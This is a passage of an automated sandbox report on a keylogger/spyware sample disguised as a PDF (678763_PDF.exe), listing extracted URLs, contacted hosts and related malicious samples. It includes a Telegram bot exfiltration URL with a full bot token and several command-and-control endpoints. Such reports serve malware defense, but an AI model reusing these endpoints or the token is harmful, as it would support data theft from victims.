                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://chrome.google.com/webstore?hl=enlBBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://apis.google.comBeskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2144153415.0000000004881000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://drive.usercontent.google.com/wBeskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.org/xml/Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.office.com/Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DC2000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoBeskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://translate.google.com/translate_a/element.jsBeskftigelsesmssiges.exe, 00000006.00000003.2239275513.0000000004C62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.2148236581.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://drive.usercontent.google.com/Beskftigelsesmssiges.exe, 00000006.00000002.2943970761.0000000004C20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://checkip.dyndns.orgBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF6000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E4C000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CA8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021D1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CD8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://nsis.sf.net/NSIS_ErrorError678763_PDF.exe, Beskftigelsesmssiges.exe.1.drfalse
                                                                                                              high
                                                                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://api.telegram.org/bot8138030788:AAEti5Rsvkh3t9x1DE3f72xKiRnG5XE9PkI/sendDocument?chat_id=7844Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://aborters.duckdns.org:8081Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://51.38.247.67:8081/_send_.php?LBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://crl.micropowershell.exe, 00000001.00000002.2149944779.0000000006F73000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2143382911.0000000000739000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://anotherarmy.dns.army:8081Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2144153415.00000000049D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://reallyfreegeoip.orgBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C1D000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020CB3000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020C8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBeskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E27000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E54000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021C83000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021F2A000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CF8000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021CB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://api.telegram.orgBeskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D4F000.00000004.00000800.00020000.00000000.sdmp, Beskftigelsesmssiges.exe, 00000006.00000002.2955973665.0000000020D75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Beskftigelsesmssiges.exe, 00000006.00000002.2957342572.0000000021E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs
                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          132.226.8.169
                                                                                                                                          checkip.dyndns.comUnited States
                                                                                                                                          16989UTMEMUSfalse
                                                                                                                                          149.154.167.220
                                                                                                                                          api.telegram.orgUnited Kingdom
                                                                                                                                          62041TELEGRAMRUfalse
                                                                                                                                          142.250.181.129
                                                                                                                                          drive.usercontent.google.comUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          172.217.19.174
                                                                                                                                          drive.google.comUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          172.67.177.134
                                                                                                                                          reallyfreegeoip.orgUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1566735
                                                                                                                                          Start date and time:2024-12-02 16:13:07 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 7m 45s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:678763_PDF.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@6/13@5/5
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 66.7%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 97%
                                                                                                                                          • Number of executed functions: 130
                                                                                                                                          • Number of non-executed functions: 81
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: 678763_PDF.exe
                                                                                                                                          TimeTypeDescription
                                                                                                                                          10:13:59API Interceptor35x Sleep call for process: powershell.exe modified
                                                                                                                                          10:15:10API Interceptor11303x Sleep call for process: Beskftigelsesmssiges.exe modified
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          132.226.8.169Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          FATURA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          JIL-_Document_No._2500015903.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          Viderefrt.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          PACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          149.154.167.220HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                            #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              https://fn-fi.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                    tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        New Order C0038 2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              api.telegram.orgHALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://fn-fi.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              New Order C0038 2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              checkip.dyndns.comHALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 158.101.44.242
                                                                                                                                                              RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 193.122.6.168
                                                                                                                                                              swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 193.122.130.0
                                                                                                                                                              Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              reallyfreegeoip.orgHALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TELEGRAMRUHALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://fn-fi.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              New Order C0038 2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              UTMEMUSHALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 132.226.8.169
                                                                                                                                                              021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              PO80330293.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              RYSUNEK_.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 132.226.247.73
                                                                                                                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                              • 132.226.26.69
                                                                                                                                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                              • 132.226.187.188
                                                                                                                                                              CLOUDFLARENETUSSwiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 188.114.97.9
                                                                                                                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                              • 104.21.16.9
                                                                                                                                                              Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 172.67.194.230
                                                                                                                                                              Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 188.114.96.6
                                                                                                                                                              https://mlkp.mailinghub.net/?r=aHR0cHM6Ly93ZXRodW50LmNvbS9wcm9maWxlL25vdGlmaWNhdGlvbnM%2FYWs9MTczMDY1MjM1NVdjY3pCYjVSOGImcGU9MzY2MTgmc3ViX2lkPTQxNjMwNzUzNTgmcD0xODE5NSZkZWxpdmVyX2lkPTc0OTIzNDYxNjQxNzkyNzk4MSZpc19uZXdfc3ViPTEmdnM9Mg%3D%3D&did=749234616417927981Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 172.67.73.31
                                                                                                                                                              New Order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 188.114.96.6
                                                                                                                                                              HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              http://trendisall.comGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 172.67.211.129
                                                                                                                                                              QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 104.21.67.152
                                                                                                                                                              111101155134.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                              • 172.67.147.247
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adHALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 172.67.177.134
                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eHALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              l6F8Xgr0Ov.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              SPlVyHiGOz.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              55qIbHIAZi.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              tEEa6j67ss.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Quotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              Quote Qu11262024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              Factura 9000012567.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              Comprobante de pago.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              Factura 9000012567.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
                                                                                                                                                              Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              • 142.250.181.129
                                                                                                                                                              • 172.217.19.174
